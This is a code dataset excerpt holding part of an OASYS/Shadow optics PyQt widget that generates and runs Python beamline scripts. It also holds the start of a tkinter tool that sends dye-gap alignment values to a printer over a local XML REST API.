TODO: dinamically adjust groupbox height to fill blank spaces\n # Idea: Grid inside another grid\n update_button = QPushButton('Update')\n execute_button = QPushButton('Run Script')\n self.save_button = QPushButton('Save Script to File')\n update_button.clicked.connect(self.update_script)\n execute_button.clicked.connect(self.execute_script)\n self.save_button.clicked.connect(self.save_script)\n \n # Create hybrid checkboxes\n setup_v_box.addWidget(update_button)\n setup_v_box.addWidget(execute_button)\n setup_v_box.addWidget(self.save_button)\n \n setup_v_box.addStretch()\n \n# =============================================================================\n# Create python script section\n# =============================================================================\n self.scr_entry = QTextEdit()\n \n self.scr_console = PythonConsole(self.__dict__, self)\n \n scr_v_box = QVBoxLayout()\n scr_v_box.setContentsMargins(5, 5, 5, 5)\n \n scr_v_box.addWidget(scr_label)\n scr_v_box.addWidget(self.scr_entry, 3)\n scr_v_box.addWidget(self.scr_console)\n \n # Add more layouts to main grid\n main_grid.addLayout(setup_v_box, 0, 0, 1, 1)\n main_grid.addLayout(scr_v_box, 0, 1, 1, 4)\n \n self.setLayout(main_grid)\n \n \n def clearLayout(self, layout):\n while layout.count():\n child = layout.takeAt(0)\n if child.widget():\n child.widget().deleteLater()\n \n def update_script(self):\n try:\n self.scr_entry.setText(str(funcs.make_python_script_from_list(self.element_list)))\n except:\n self.scr_entry.setText(\"Problem in writing python script:\\n\" + str(sys.exc_info()[0]) 
+ \": \" + str(sys.exc_info()[1]))\n \n \n def execute_script(self):\n self._script = str(self.scr_entry.toPlainText())\n self.scr_console.write(\"\\nRunning script:\\n\")\n self.scr_console.push(\"exec(_script)\")\n self.scr_console.new_prompt(sys.ps1)\n # FIXME: add optlnls as a required package (fix console error)\n\n\n def save_script(self):\n file_name = QFileDialog.getSaveFileName(self, \"Save File to Disk\", \".\", \"*.py\")[0]\n\n if not file_name is None:\n if not file_name.strip() == \"\":\n file = open(file_name, \"w\")\n file.write(str(self.scr_entry.toPlainText()))\n file.close()\n\n QtWidgets.QMessageBox.information(self, \"QMessageBox.information()\",\n \"File \" + file_name + \" written to disk\",\n QtWidgets.QMessageBox.Ok)\n \n def setBeam(self, beam):\n if ShadowCongruence.checkEmptyBeam(beam):\n if ShadowCongruence.checkGoodBeam(beam):\n\n # TODO: Code detection for more elements\n #\n # Crystals done\n # Gratings done\n # Lenses \n # CRL \n # KB (?) \n # Transfocators \n # \n # Compound elements must be broken into more elements\n\n # TODO: If element_list is not empty, do not create new elements, just reuse the existing ones\n # \n # 1. old_list, new_list\n # 2. if new_list == old_list, old_list = new_list\n # 3. if new_list != old_list, check each element and compare hybrid parameters\n \n self.input_beam = beam \n \n if 'element_list' in globals():\n pass\n else:\n self.element_list = []\n \n self.scr_entry.setText('')\n \n for history_element in self.input_beam.getOEHistory():\n temp_list = []\n name = history_element._widget_class_name\n \n if not history_element._shadow_source_start is None:\n new = classes.ElementSetup(name, 0, 0)\n temp_list.append(new)\n temp_list.append(history_element._shadow_source_start.src)\n \n self.element_list.append(temp_list)\n \n elif not history_element._shadow_oe_start is None:\n \n ### TODO: This section must be optimized (credo, que gambiarra) \n ### Improvements: check if element contains a list and break it into multiple elements\n if type(history_element._shadow_oe_start) is ShadowCompoundOpticalElement:\n \n new_list = []\n #if isinstance(history_element._shadow_oe_start, (Shadow.CompoundOE,Shadow.ShadowLibExtensions.CompoundOE)):\n new_list.extend(history_element._shadow_oe_start._oe.list)\n \n # TODO: Improve parameter detection for 'Hybridable' Compound Optical Elements.\n # Hybrid configuration window probably need to be different. 
For each case (sadness and sorrow)\n if 'Lens' in name or 'CRL' in name or 'Transfocator' in name: can = True\n else: can = False\n \n new = classes.ElementSetup(name, 0, 0, can_hybrid=can)\n for i in new_list:\n temp_list = [new, i]\n self.element_list.append(temp_list)\n \n else:\n distance = history_element._shadow_oe_start._oe.T_IMAGE\n focallength = history_element._shadow_oe_start._oe.SIMAG\n \n if 'Crystal' in name or 'Zone Plate' in name: can = False\n else: can = True\n \n new = classes.ElementSetup(name, distance, focallength, can_hybrid=can)\n temp_list.append(new)\n temp_list.append(history_element._shadow_oe_start._oe)\n \n self.element_list.append(temp_list)\n \n self.vbox.addWidget(new)\n self.vbox.addStretch()\n\n try:\n self.scr_entry.setText(str(funcs.make_python_script_from_list(self.element_list)))\n except:\n self.scr_entry.setText(\"Problem in writing python script:\\n\" + str(sys.exc_info()[0]) + \": \" + str(sys.exc_info()[1]))\n else:\n QtWidgets.QMessageBox.critical(self, \"Error\",\n \"Data not displayable: No good rays or bad content\",\n QtWidgets.QMessageBox.Ok)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = HybridInfo()\n sys.exit(app.exec_())", "repo_name": "oasys-lnls-kit/OASYS1-LNLS-ShadowOui", "sub_path": "orangecontrib/shadow/lnls/widgets/utility/ow_hybridinfo_widget.py", "file_name": "ow_hybridinfo_widget.py", "file_ext": "py", "file_size_in_byte": 11022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oasys.widgets.widget.OWWidget", "line_number": 36, "usage_type": "attribute"}, {"api_name": "oasys.widgets.widget", "line_number": 36, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_objects.ShadowBeam", "line_number": 49, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.desktop", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 67, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 88, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 89, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignCenter", "line_number": 90, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 91, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignLeft", "line_number": 93, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 93, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 98, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QScrollArea", "line_number": 106, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 118, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 119, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 134, "usage_type": "call"}, {"api_name": 
"orangecontrib.shadow.util.python_script.PythonConsole", "line_number": 136, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 138, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs.make_python_script_from_list", "line_number": 160, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs", "line_number": 160, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.ps1", "line_number": 169, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getSaveFileName", "line_number": 174, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 174, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.information", "line_number": 182, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 182, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 184, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 184, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence.checkEmptyBeam", "line_number": 187, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence", "line_number": 187, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence.checkGoodBeam", "line_number": 188, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence", "line_number": 188, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes.ElementSetup", "line_number": 221, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes", "line_number": 221, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_objects.ShadowCompoundOpticalElement", "line_number": 231, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes.ElementSetup", "line_number": 242, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes", "line_number": 242, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes.ElementSetup", "line_number": 254, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes", "line_number": 254, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs.make_python_script_from_list", "line_number": 264, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs", "line_number": 264, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 266, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.critical", "line_number": 268, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 268, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 268, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 270, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 270, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 273, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 273, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 275, "usage_type": "call"}]} +{"seq_id": 
"42619411626", "text": "#!/usr/bin/python3\n# Author: Ronny Toribio\n# Project: Dye Gap Adjustment Tool\n# Description: A dye gap adjustment tool that uses an XML REST API and apa_data.xml.\nimport os\nimport os.path\nfrom time import sleep\n\nimport_errors = 0\ntry:\n import tkinter as tk\n import tkinter.ttk as ttk\n from tkinter import filedialog\n from tkinter import messagebox\nexcept:\n print(\"The tkinter module is not installed.\")\n import_errors += 1\ntry:\n from requests import post, get\nexcept:\n print(\"The requests module is not installed.\")\n import_errors += 1\nif import_errors:\n exit(1)\n\nDEFAULT_STATUS = \" Reading current dye values.\"\nFILE_LOAD_SUCCESSFULL = \" The apa_data.xml file was loaded successfully.\"\nFILE_SAVE_SUCCESSFULL = \" The changes were saved successfully.\"\nFILE_SAVE_UNSUCCESSFULL = \"The changes could not be saved.\"\nUNSAVED_CHANGES = \" There are unsaved changes.\"\nPRINTER_IP = \"127.0.0.1\"\nRAW_SET_DYE_COMMAND = \"\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\t\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\t18\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\toem_set_alignment_values 0 ,0,{},{},{},{}\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\r\\n\"\n\nGAP_VALUE_RANGE = [\n -200, -192, -184, -176, -168,\n -160, -152, -144, -136, -128,\n -120, -112, -104, -96, -88,\n -80, -72, -64, -56, -48,\n -40, -32, -24, -16, -8,\n 0,\n 8, 16, 24, 32, 40,\n 48, 56, 64, 72, 80,\n 88, 96, 104, 112, 120,\n 128, 136, 144, 152, 160,\n 168, 176, 184, 192, 200\n]\n\n\ndef last_print_value(dye):\n if dye == 0:\n return 1200\n else:\n return 19200\n\n\ndef get_raw_line_values(line):\n new_line = str()\n for c in line:\n if c in \"0123456789,\":\n new_line += c\n return new_line.split(\",\")\n\n\ndef set_dye(dye, color, value):\n success = False\n xml = RAW_SET_DYE_COMMAND.format(dye, color, value, last_print_value(dye))\n headers = {}\n headers[\"Accept\"] = \"*/*\"\n headers[\"Content-Type\"] = \"text/xml; charset=UTF-8\"\n headers[\"User-Agent\"] = \"MERONG(0.9/;p)\"\n headers[\"Host\"] = f\"{PRINTER_IP}:8080\"\n headers[\"Content-Length\"] = str(len(xml))\n headers[\"Connection\"] = \"Keep-Alive\"\n headers[\"Cache-Control\"] = \"no-cache\"\n r = post(f\"http://{PRINTER_IP}:8080/OemsiMediapath/Function\", headers=headers, data=xml)\n if r.status_code != 200:\n messagebox.showinfo(\"set_dye() error\", f\"HTTP response code is {r.status_code}\")\n elif \"text/xml\" in r.headers[\"Content-Type\"]:\n content = r.content.decode()\n if \"0\" in content:\n success = True\n return success\n\n\nclass DyeGapAdjustmentTool:\n has_changed = False\n def __init__(self):\n self.root = tk.Tk()\n width = 418\n height = 355\n screen_wcenter = int((self.root.winfo_screenwidth() / 2) - (width / 2))\n screen_hcenter = int((self.root.winfo_screenheight() / 2) - (height / 2))\n self.root.geometry(f\"{width}x{height}+{screen_wcenter}+{screen_hcenter}\")\n self.root.resizable(False, False)\n self.root.title(\"Dye Gap Adjustment Tool\")\n\n # Keyboard Shortcuts\n self.root.bind(\"\", lambda e: self.load_APA_file())\n self.root.bind(\"\", lambda e: self.load_APA_file())\n self.root.bind(\"\", lambda e: self.save_changes())\n self.root.bind(\"\", lambda e: self.root.quit())\n\n # Menu Bar\n self.menubar = tk.Menu(self.root)\n self.filemenu = tk.Menu(self.menubar, tearoff=0)\n self.filemenu.add_command(label=\"Open\", command=self.load_APA_file, accelerator=\"Ctrl+O\")\n self.filemenu.add_command(label=\"Save\", command=self.save_changes, accelerator=\"Ctrl+S\")\n self.filemenu.add_separator()\n 
self.filemenu.add_command(label=\"Exit\", command=self.root.quit, accelerator=\"Ctrl+Q\")\n self.menubar.add_cascade(label=\"File\", menu=self.filemenu)\n self.helpmenu = tk.Menu(self.menubar, tearoff=0)\n self.helpmenu.add_command(label=\"About\", command=lambda: messagebox.showinfo(\"About\", \"Dye Gap Adjustment Tool\\nDeveloped by Ronny Toribio.\"))\n self.menubar.add_cascade(label=\"Help\", menu=self.helpmenu)\n self.root.config(menu=self.menubar)\n\n # Main Panels\n self.dyes_panel = tk.Frame(self.root)\n self.dyes_panel.pack()\n self.button_panel = tk.Frame(self.root)\n self.button_panel.pack(padx=20, pady=20)\n self.status_panel = tk.Frame(self.root)\n self.status_panel.pack(side=tk.BOTTOM, fill=tk.X)\n\n # Status Bar\n self.statusVar = tk.StringVar()\n self.statusBar = tk.Label(self.status_panel, textvariable=self.statusVar, bd=1, width=59, relief=tk.SUNKEN, anchor=tk.W, font=(\"arial\", 10, \"normal\"))\n self.statusBar.pack()\n self.statusVar.set(DEFAULT_STATUS)\n\n # Dye 0\n self.dye_0_var = tk.IntVar()\n self.dye_0_var.set(0)\n self.dye_0_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 0\")\n self.dye_0_panel.grid(column=0, row=0, padx=5, pady=5)\n self.dye_0_lab = tk.Label(self.dye_0_panel, width=4, textvariable=self.dye_0_var)\n self.dye_0_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_0_inc = tk.Button(self.dye_0_panel, text=\"U\", command=self.increment_dye_0)\n self.dye_0_inc.grid(column=1, row=0)\n self.dye_0_inc[\"state\"] = \"disable\"\n self.dye_0_dec = tk.Button(self.dye_0_panel, text=\"D\", command=self.decrement_dye_0)\n self.dye_0_dec.grid(column=1, row=1)\n self.dye_0_dec[\"state\"] = \"disable\"\n\n # Dye 1\n self.dye_1_var = tk.IntVar()\n self.dye_1_var.set(0)\n self.dye_1_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 1\")\n self.dye_1_panel.grid(column=1, row=0, padx=5, pady=5)\n self.dye_1_lab = tk.Label(self.dye_1_panel, width=4, textvariable=self.dye_1_var)\n self.dye_1_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_1_inc = tk.Button(self.dye_1_panel, text=\"U\", command=self.increment_dye_1)\n self.dye_1_inc.grid(column=1, row=0)\n self.dye_1_inc[\"state\"] = \"disable\"\n self.dye_1_dec = tk.Button(self.dye_1_panel, text=\"D\", command=self.decrement_dye_1)\n self.dye_1_dec.grid(column=1, row=1)\n self.dye_1_dec[\"state\"] = \"disable\"\n\n # Dye 2\n self.dye_2_var = tk.IntVar()\n self.dye_2_var.set(0)\n self.dye_2_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 2\")\n self.dye_2_panel.grid(column=2, row=0, padx=5, pady=5)\n self.dye_2_lab = tk.Label(self.dye_2_panel, width=4, textvariable=self.dye_2_var)\n self.dye_2_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_2_inc = tk.Button(self.dye_2_panel, text=\"U\", command=self.increment_dye_2)\n self.dye_2_inc.grid(column=1, row=0)\n self.dye_2_inc[\"state\"] = \"disable\"\n self.dye_2_dec = tk.Button(self.dye_2_panel, text=\"D\", command=self.decrement_dye_2)\n self.dye_2_dec.grid(column=1, row=1)\n self.dye_2_dec[\"state\"] = \"disable\"\n\n # Dye 3\n self.dye_3_var = tk.IntVar()\n self.dye_3_var.set(0)\n self.dye_3_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 3\")\n self.dye_3_panel.grid(column=3, row=0, padx=5, pady=5)\n self.dye_3_lab = tk.Label(self.dye_3_panel, width=4, textvariable=self.dye_3_var)\n self.dye_3_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_3_inc = tk.Button(self.dye_3_panel, text=\"U\", command=self.increment_dye_3)\n self.dye_3_inc.grid(column=1, row=0)\n self.dye_3_inc[\"state\"] = \"disable\"\n self.dye_3_dec = 
tk.Button(self.dye_3_panel, text=\"D\", command=self.decrement_dye_3)\n self.dye_3_dec.grid(column=1, row=1)\n self.dye_3_dec[\"state\"] = \"disable\"\n\n # Dye 4\n self.dye_4_var = tk.IntVar()\n self.dye_4_var.set(0)\n self.dye_4_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 4\")\n self.dye_4_panel.grid(column=4, row=0, padx=5, pady=5)\n self.dye_4_panel.grid_propagate(1)\n self.dye_4_lab = tk.Label(self.dye_4_panel, width=4, textvariable=self.dye_4_var)\n self.dye_4_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_4_inc = tk.Button(self.dye_4_panel, text=\"U\", command=self.increment_dye_4)\n self.dye_4_inc.grid(column=1, row=0)\n self.dye_4_inc[\"state\"] = \"disable\"\n self.dye_4_dec = tk.Button(self.dye_4_panel, text=\"D\", command=self.decrement_dye_4)\n self.dye_4_dec.grid(column=1, row=1)\n self.dye_4_dec[\"state\"] = \"disable\"\n\n # Dye 5\n self.dye_5_var = tk.IntVar()\n self.dye_5_var.set(0)\n self.dye_5_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 5\")\n self.dye_5_panel.grid(column=0, row=1, padx=5, pady=5)\n self.dye_5_lab = tk.Label(self.dye_5_panel, width=4, textvariable=self.dye_5_var)\n self.dye_5_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_5_inc = tk.Button(self.dye_5_panel, text=\"U\", command=self.increment_dye_5)\n self.dye_5_inc.grid(column=1, row=0)\n self.dye_5_inc[\"state\"] = \"disable\"\n self.dye_5_dec = tk.Button(self.dye_5_panel, text=\"D\", command=self.decrement_dye_5)\n self.dye_5_dec.grid(column=1, row=1)\n self.dye_5_dec[\"state\"] = \"disable\"\n\n # Dye 6\n self.dye_6_var = tk.IntVar()\n self.dye_6_var.set(0)\n self.dye_6_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 6\")\n self.dye_6_panel.grid(column=1, row=1, padx=5, pady=5)\n self.dye_6_lab = tk.Label(self.dye_6_panel, width=4, textvariable=self.dye_6_var)\n self.dye_6_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_6_inc = tk.Button(self.dye_6_panel, text=\"U\", command=self.increment_dye_6)\n self.dye_6_inc.grid(column=1, row=0)\n self.dye_6_inc[\"state\"] = \"disable\"\n self.dye_6_dec = tk.Button(self.dye_6_panel, text=\"D\", command=self.decrement_dye_6)\n self.dye_6_dec.grid(column=1, row=1)\n self.dye_6_dec[\"state\"] = \"disable\"\n\n # Dye 7\n self.dye_7_var = tk.IntVar()\n self.dye_7_var.set(0)\n self.dye_7_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 7\")\n self.dye_7_panel.grid(column=2, row=1, padx=5, pady=5)\n self.dye_7_lab = tk.Label(self.dye_7_panel, width=4, textvariable=self.dye_7_var)\n self.dye_7_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_7_inc = tk.Button(self.dye_7_panel, text=\"U\", command=self.increment_dye_7)\n self.dye_7_inc.grid(column=1, row=0)\n self.dye_7_inc[\"state\"] = \"disable\"\n self.dye_7_dec = tk.Button(self.dye_7_panel, text=\"D\", command=self.decrement_dye_7)\n self.dye_7_dec.grid(column=1, row=1)\n self.dye_7_dec[\"state\"] = \"disable\"\n\n # Dye 8\n self.dye_8_var = tk.IntVar()\n self.dye_8_var.set(0)\n self.dye_8_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 8\")\n self.dye_8_panel.grid(column=3, row=1, padx=5, pady=5)\n self.dye_8_lab = tk.Label(self.dye_8_panel, width=4, textvariable=self.dye_8_var)\n self.dye_8_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_8_inc = tk.Button(self.dye_8_panel, text=\"U\", command=self.increment_dye_8)\n self.dye_8_inc.grid(column=1, row=0)\n self.dye_8_inc[\"state\"] = \"disable\"\n self.dye_8_dec = tk.Button(self.dye_8_panel, text=\"D\", command=self.decrement_dye_8)\n self.dye_8_dec.grid(column=1, row=1)\n self.dye_8_dec[\"state\"] = 
\"disable\"\n\n # Dye 9\n self.dye_9_var = tk.IntVar()\n self.dye_9_var.set(0)\n self.dye_9_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 9\")\n self.dye_9_panel.grid(column=4, row=1, padx=5, pady=5)\n self.dye_9_lab = tk.Label(self.dye_9_panel, width=4, textvariable=self.dye_9_var)\n self.dye_9_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_9_inc = tk.Button(self.dye_9_panel, text=\"U\", command=self.increment_dye_9)\n self.dye_9_inc.grid(column=1, row=0)\n self.dye_9_inc[\"state\"] = \"disable\"\n self.dye_9_dec = tk.Button(self.dye_9_panel, text=\"D\", command=self.decrement_dye_9)\n self.dye_9_dec.grid(column=1, row=1)\n self.dye_9_dec[\"state\"] = \"disable\"\n\n # Dye 10\n self.dye_10_var = tk.IntVar()\n self.dye_10_var.set(0)\n self.dye_10_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 10\")\n self.dye_10_panel.grid(column=0, row=2, padx=5, pady=5)\n self.dye_10_lab = tk.Label(self.dye_10_panel, width=4, textvariable=self.dye_10_var)\n self.dye_10_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_10_inc = tk.Button(self.dye_10_panel, text=\"U\", command=self.increment_dye_10)\n self.dye_10_inc.grid(column=1, row=0)\n self.dye_10_inc[\"state\"] = \"disable\"\n self.dye_10_dec = tk.Button(self.dye_10_panel, text=\"D\", command=self.decrement_dye_10)\n self.dye_10_dec.grid(column=1, row=1)\n self.dye_10_dec[\"state\"] = \"disable\"\n\n # Dye 11\n self.dye_11_var = tk.IntVar()\n self.dye_11_var.set(0)\n self.dye_11_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 11\")\n self.dye_11_panel.grid(column=1, row=2, padx=5, pady=5)\n self.dye_11_lab = tk.Label(self.dye_11_panel, width=4, textvariable=self.dye_11_var)\n self.dye_11_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_11_inc = tk.Button(self.dye_11_panel, text=\"U\", command=self.increment_dye_11)\n self.dye_11_inc.grid(column=1, row=0)\n self.dye_11_inc[\"state\"] = \"disable\"\n self.dye_11_dec = tk.Button(self.dye_11_panel, text=\"D\", command=self.decrement_dye_11)\n self.dye_11_dec.grid(column=1, row=1)\n self.dye_11_dec[\"state\"] = \"disable\"\n\n # Dye 12\n self.dye_12_var = tk.IntVar()\n self.dye_12_var.set(0)\n self.dye_12_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 12\")\n self.dye_12_panel.grid(column=2, row=2, padx=5, pady=5)\n self.dye_12_lab = tk.Label(self.dye_12_panel, width=4, textvariable=self.dye_12_var)\n self.dye_12_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_12_inc = tk.Button(self.dye_12_panel, text=\"U\", command=self.increment_dye_12)\n self.dye_12_inc.grid(column=1, row=0)\n self.dye_12_inc[\"state\"] = \"disable\"\n self.dye_12_dec = tk.Button(self.dye_12_panel, text=\"D\", command=self.decrement_dye_12)\n self.dye_12_dec.grid(column=1, row=1)\n self.dye_12_dec[\"state\"] = \"disable\"\n\n # Dye 13\n self.dye_13_var = tk.IntVar()\n self.dye_13_var.set(0)\n self.dye_13_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 13\")\n self.dye_13_panel.grid(column=3, row=2, padx=5, pady=5)\n self.dye_13_lab = tk.Label(self.dye_13_panel, width=4, textvariable=self.dye_13_var)\n self.dye_13_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_13_inc = tk.Button(self.dye_13_panel, text=\"U\", command=self.increment_dye_13)\n self.dye_13_inc.grid(column=1, row=0)\n self.dye_13_inc[\"state\"] = \"disable\"\n self.dye_13_dec = tk.Button(self.dye_13_panel, text=\"D\", command=self.decrement_dye_13)\n self.dye_13_dec.grid(column=1, row=1)\n self.dye_13_dec[\"state\"] = \"disable\"\n\n # Dye Variables List\n self.dye_vars = [self.dye_0_var,\n self.dye_1_var,\n 
self.dye_2_var,\n self.dye_3_var,\n self.dye_4_var,\n self.dye_5_var,\n self.dye_6_var,\n self.dye_7_var,\n self.dye_8_var,\n self.dye_9_var,\n self.dye_10_var,\n self.dye_11_var,\n self.dye_12_var,\n self.dye_13_var]\n\n # Changed Dyes Set\n self.changed_dyes = set()\n\n # Operation Buttons\n self.load_button = tk.Button(self.button_panel, text=\"Load File\", command=self.load_APA_file)\n self.load_button.grid(column=0, row=6)\n self.save_button = tk.Button(self.button_panel, text=\"Apply Changes\", command=self.save_changes)\n self.save_button.grid(column=1, row=6)\n self.save_button[\"state\"] = \"disabled\"\n\n # Increase/Decrease Button Images\n if os.path.exists(\"tri-up.png\") and os.path.exists(\"tri-down.png\"):\n tri_up = tk.PhotoImage(file=\"tri-up.png\")\n tri_down = tk.PhotoImage(file=\"tri-down.png\")\n self.dye_0_inc.configure(image=tri_up, text=\"\")\n self.dye_0_dec.configure(image=tri_down, text=\"\")\n self.dye_0_inc.image = tri_up\n self.dye_0_dec.image = tri_down\n self.dye_1_inc.configure(image=tri_up, text=\"\")\n self.dye_1_dec.configure(image=tri_down, text=\"\")\n self.dye_1_inc.image = tri_up\n self.dye_1_dec.image = tri_down\n self.dye_2_inc.configure(image=tri_up, text=\"\")\n self.dye_2_dec.configure(image=tri_down, text=\"\")\n self.dye_2_inc.image = tri_up\n self.dye_2_dec.image = tri_down\n self.dye_3_inc.configure(image=tri_up, text=\"\")\n self.dye_3_dec.configure(image=tri_down, text=\"\")\n self.dye_3_inc.image = tri_up\n self.dye_3_dec.image = tri_down\n self.dye_4_inc.configure(image=tri_up, text=\"\")\n self.dye_4_dec.configure(image=tri_down, text=\"\")\n self.dye_4_inc.image = tri_up\n self.dye_4_dec.image = tri_down\n self.dye_5_inc.configure(image=tri_up, text=\"\")\n self.dye_5_dec.configure(image=tri_down, text=\"\")\n self.dye_5_inc.image = tri_up\n self.dye_5_dec.image = tri_down\n self.dye_6_inc.configure(image=tri_up, text=\"\")\n self.dye_6_dec.configure(image=tri_down, text=\"\")\n self.dye_6_inc.image = tri_up\n self.dye_6_dec.image = tri_down\n self.dye_7_inc.configure(image=tri_up, text=\"\")\n self.dye_7_dec.configure(image=tri_down, text=\"\")\n self.dye_7_inc.image = tri_up\n self.dye_7_dec.image = tri_down\n self.dye_8_inc.configure(image=tri_up, text=\"\")\n self.dye_8_dec.configure(image=tri_down, text=\"\")\n self.dye_8_inc.image = tri_up\n self.dye_8_dec.image = tri_down\n self.dye_9_inc.configure(image=tri_up, text=\"\")\n self.dye_9_dec.configure(image=tri_down, text=\"\")\n self.dye_9_inc.image = tri_up\n self.dye_9_dec.image = tri_down\n self.dye_10_inc.configure(image=tri_up, text=\"\")\n self.dye_10_dec.configure(image=tri_down, text=\"\")\n self.dye_10_inc.image = tri_up\n self.dye_10_dec.image = tri_down\n self.dye_11_inc.configure(image=tri_up, text=\"\")\n self.dye_11_dec.configure(image=tri_down, text=\"\")\n self.dye_11_inc.image = tri_up\n self.dye_11_dec.image = tri_down\n self.dye_12_inc.configure(image=tri_up, text=\"\")\n self.dye_12_dec.configure(image=tri_down, text=\"\")\n self.dye_12_inc.image = tri_up\n self.dye_12_dec.image = tri_down\n self.dye_13_inc.configure(image=tri_up, text=\"\")\n self.dye_13_dec.configure(image=tri_down, text=\"\")\n self.dye_13_inc.image = tri_up\n self.dye_13_dec.image = tri_down\n\n def mark_change(self):\n self.has_changed = True\n 